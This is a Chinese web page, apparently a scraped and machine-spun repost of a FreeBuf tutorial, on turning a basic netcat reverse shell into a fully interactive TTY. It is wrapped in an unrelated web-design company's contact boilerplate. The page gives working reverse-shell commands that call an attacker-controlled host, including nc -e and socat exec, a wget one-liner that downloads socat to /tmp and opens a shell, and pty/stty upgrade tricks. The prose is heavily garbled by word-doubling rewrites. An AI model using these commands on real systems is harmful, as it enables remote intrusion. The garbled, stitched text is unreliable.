广州凡科互联网科技有限公司

营业时间
MON-SAT 9:00-18:00

全国服务热线
18720358503

公司门店地址
广州市海珠区工业大道北67号凤凰创意园

一键建设网站综合服务平台—怎样把简单的Shel

日期:2021-05-08 浏览:

········· 顾客服务 企业服务 ··· 生产制造制造行业vip会员会员专区 CNCERT CNNVD

创作管理方法管理中心

官方网网手机微信微信公众号企业安全性性新浪网网新浪网新浪微博

FreeBuf.COM互连网安全性性生产制造制造行业门户网网,每日发布技术性技术专业的安全性性新闻报道新闻资讯、技术性性剖析。

FreeBuf+手机微信微信小程序把安全性性放入包装袋

如何将简单的Shell转换变为完全互动交流式的TTY

如何将简单的Shell转换变为完全互动交流式的TTY

14:00:54

作为一名渗透到检验工作中工作人员,最使人激动的莫过netcat为大伙儿反跳回了一个shell连接,以及依据id命令查寻到一个令人让人令人满意的顾客管理方法管理权限。
[标识:內容1]
要是是事都会有出現出现意外,由于大伙儿得到的shell实际上并不是一个具有详尽互动交流的shell,因此可能会在运用整个过程中被离线,甚至还可能会因为为为大伙儿的具体实际操作错误,例如非常大心摁下了 “Ctrl-C”键,这将马上终止大伙儿的所有shell全过程让徒劳无功无功而归。


除开没有适当处理SIGINT(数据信息数据信号)之外,这类“哑”shell也是有别的诸多缺点:

一些命令如su和ssh,务必一个适当的终端设备机器设备才能够运行一般没法显示信息STDERR无法一切一切正常运用vim等文本撰写器没有开展标志没有往上箭头符号标记运用历史时间時间没有jobcontrol等

长话短说虽然这类sehll也十分好,但我日趋向于在完全互动交流沟通交流的TTY中进行具体实际操作。下面我将为大家共享资源一些用以“升级”这类shell的方式和方法。在公布一开始之前我向大家明显强烈推荐一个叫Pentest Monkey的blog,以及Phineas Fisher的技术性性视频和writeup:

便于有益于演试,以下所有的显示信息屏手机截图和命令都将在一台易受攻击的Web互联网网络服务器(“VICTIM”)和用于捕获shell的Kali VM(“KALI”)勤奋行。

VICTIM IP: 10.0.3.7KALI IP: 10.0.3.4转换成反向shell命令

大伙儿最开始运用netcat来得到最常常见的反向shell:

nc -e /bin/sh 10.0.3.4 4444 

在kali虚拟机上中家输入以下命令:

nc -lvp 4444 

难点沒有于每个互联网网络服务器不是是都安装了netcat,并且也不是每个版本号号的netcat都具备-e挑选项。Pentest Monkey有篇相关反向shell的,为大伙儿提供了一些不一样的方法。但我更热衷于于于运用Metasploit的msfvenom一行转换成命令。

Metasploit在“cmd/unix”下,好多个可用于转换签单行关系或反向shell的payload:


以上显示信息信息内容的所有payload都可以以以和msfvenom一起运用,并且大伙儿可以根据自身规定特殊LHOST,LPORT或RPORT。例如,这儿是一个无需-e标识的netcat命令:


倘若没有安装netcat,大伙儿还可以转换成一个Perl的反向shell:


这类都可以以以依据运用netcat,并侦听特殊的端口号号(4444)来捕获。

方法1:Python pty操纵控制模块

对于早就安装了python的系统软件手机软件,大伙儿可让用python提供的pty操纵控制模块,只务必一行脚本制作制作即可以创建一个原生态态的终端设备机器设备,命令下列:

python -c 'import pty; pty.spawn("/bin/bash")' 

新建立开展后,大伙儿这时候即可以运行su命令了。(并且网页页面提示也越来越越更加友好)


即使如此,但难点仍然没有完全的解决。例如SIGINT(Ctrl-C)仍然会关闭终止Netcat,开展标志或历史时间時间记录也仍然没有,但这一方法在实际运用中也是有一定的具体实际效果。

方法2:运用socat

socat是一个netcat上的替代专用型专用工具,可以称作nc的提升版。大伙儿可让用Socat依据TCP连接传输详尽的TTY。

倘若你获得取得成功在整体总体目标机器设备安装了socat,那么大伙儿即可以依据以下命令来得到到一个完全互动交流式的TTY反向shell:

在kali虚拟机大伙儿运行以下侦听命令:

socat file:`tty`,raw,echo=0 tcp-listen:4444 

在整体总体目标机器设备大伙儿运行:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

倘若整体总体目标系统软件手机软件没有安装socat你可以以以依据以下Github详尽详细地址,完全免费免费下载相关的二进制静态数据数据信息文本文档进行安装:

依据命令引进系统软件系统漏洞,大伙儿可以将socat二进制文本文档完全免费免费下载到一个可写的文档文件目录,并依据chmod命令修改文本文档的推行管理方法管理权限,接着在一行中推行反向shell:

wget -q github/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 

这时候在kali,你可以能得到到一个完全互动交流式的TTY会话。它可用开展标志,SIGINT/SIGSTP,vim,往上箭头符号标记运用历史时间時间等。


方法3:魔术师师一样的Netcat升级

在Phineas Fisher的技术性性视频中该方法被呈现出来,我觉得感觉好似是魔术师师一般。实际操作全过程就是在kali终端设备机器设备内设置一些stty挑选项,最终将“哑”netcat shell升级赶到一个完全互动交流的TTY。

最开始大伙儿运用与方法1一样的技术性性来转换成PTY。一旦bash在PTY中运行,大伙儿按Ctrl-Z键将shell调为后台管理管理方法运行


现如今大伙儿来检查现如今终端设备机器设备和STTY信息内容內容,因而大伙儿可以强制性性连接到shell并匹配:


必须的信息内容內容是TERM类型(“xterm-256color”)和现如今TTY的规格(38行;116列)

随后大伙儿将现如今STTY设置为raw(请确保shell仍在后台管理管理方法运行),并运用以下命令回显输入标志符:

stty raw -echo 

运用raw stty,输入/输出将看起来有点儿儿古怪,你可以以能看不了下一个命令,但是假如你键入时,她们则会强制性实行。

下一个前台接待招待shell将再度打开反向shell,但文档文件格式化将关闭。最后,再度初始化终端设备机器设备。


注意:都没有再一次键入nc命令(如圖所显示信息)。我实际努力入赶到fg(前台接待招待),但这并没有挨揍印出来。nc命令现如今是处于前台接待招待的工作中中状况。reset命令进入到netcat shell中后,shell会一切一切正常显示信息信息内容。最后一步是设置shell,终端设备机器设备类型和stty规格来匹配大伙儿现如今的Kali会话框(上面收集的信息内容內容)。

$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 38 columns 116

最终的结果便是大家将得到到一个在netcat之上的完全互动交流式的TTY,它具有大伙儿所希望的所有功效(tab-complete,history,job control等):


甚至大伙儿还可以在netcat shell上运行Tmux!


Cheatsheet

Cheatsheet命令:

运用Python作为一个伪终端设备机器设备

python -c 'import pty; pty.spawn("/bin/bash")'

运用socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 

运用stty挑选项

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows num> columns cols>

*参考来源于于:,FB网编 secist 编译程序程序,转截请标出来源于于FreeBuf.COM

原文中写作者:, 转截请标出来源于于

# shell # TTY 被以下本人个人专辑百度搜索百度收录,发现很多精彩纷呈纷呈内容 + 盈利我的本人个人专辑 开展很多

点评

按时间排序

请登录/申请办理申请注册后在FreeBuf发布内容哦

相关明显强烈推荐

关 注

0 文章内容內容数 0 点评数 0 关注者 请 / 后在FreeBuf发布内容哦



服务项目

联系方式丨CONTACT

  • 全国热线:18720358503
  • 传真热线:18720358503
  • Q Q咨询:2639601583
  • 企业邮箱:2639601583@qq.com

首页
电话
短信
联系